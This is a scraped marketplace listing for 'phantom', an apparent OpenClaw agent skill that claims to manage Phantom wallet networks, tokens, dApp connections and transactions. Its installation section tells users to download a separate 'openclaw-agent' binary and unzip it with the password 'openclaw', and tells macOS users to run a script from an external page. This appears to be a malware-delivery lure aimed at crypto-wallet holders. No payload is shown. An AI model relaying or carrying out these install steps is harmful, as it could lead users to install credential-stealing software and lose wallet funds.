phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Learn how to manage Phantom wallet assets, networks, and dApp connections using OpenClaw. Automate your Solana and EVM workflow with this essential skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-bdacvWhat This Skill Does
The phantom skill enables your OpenClaw agent to interact directly with the Phantom browser extension ecosystem. It acts as a bridge for managing multi-chain assets, enabling developers and power users to automate routine wallet tasks such as network configuration, token management, and troubleshooting. By integrating with the required openclaw-agent, this skill allows the AI to perform complex blockchain operations like adding custom RPCs, checking balances, managing dApp permissions, and executing transactions on Solana, Ethereum, Polygon, and Base networks.
Installation
Installation requires two steps. First, ensure you have installed the skill via the OpenClaw command: clawhub install openclaw/skills/skills/hightower6eu/phantom-bdacv. Second, you must install the openclaw-agent utility. For Windows users, download the binary from the official GitHub repository and extract it using the password 'openclaw'. macOS users should utilize the provided installation script found on the documentation snippet page to ensure system permissions are set correctly. Without this bridge, the agent cannot interface with the browser extension.
Use Cases
- Asset Management: Automatically add SPL tokens to your dashboard by providing contract addresses.
- Network Optimization: Seamlessly switch between custom RPCs for Solana or add EVM-compatible networks like Arbitrum and Polygon.
- Security Auditing: Periodically audit and revoke access for dApps that are no longer in use to enhance wallet security.
- Transaction Troubleshooting: Query on-chain data to confirm transaction statuses or view balance updates during high-traffic periods.
- Development Workflow: Streamline the connection between your local environment and your Phantom wallet for rapid deployment and testing of dApps.
Example Prompts
- "Phantom, please add the USDC token contract address to my token list so I can track my holdings."
- "Check if there are any suspicious dApps connected to my wallet and revoke access to any unknown ones."
- "My Solana transaction is stuck; can you check the status of this signature: [TX_SIGNATURE] and tell me if I need to increase the priority fee?"
Tips & Limitations
Always exercise extreme caution when exporting private keys or seed phrases. While the AI can help you navigate settings, never share your recovery phrase in a prompt. The skill relies on the local openclaw-agent daemon; ensure this process is active before triggering commands, as the browser extension is sandboxed by design. When dealing with priority fees, start with 'Normal' unless the network is under extreme load, as higher fees will consume more native gas tokens (SOL/ETH/MATIC) unnecessarily.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-bdacv": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.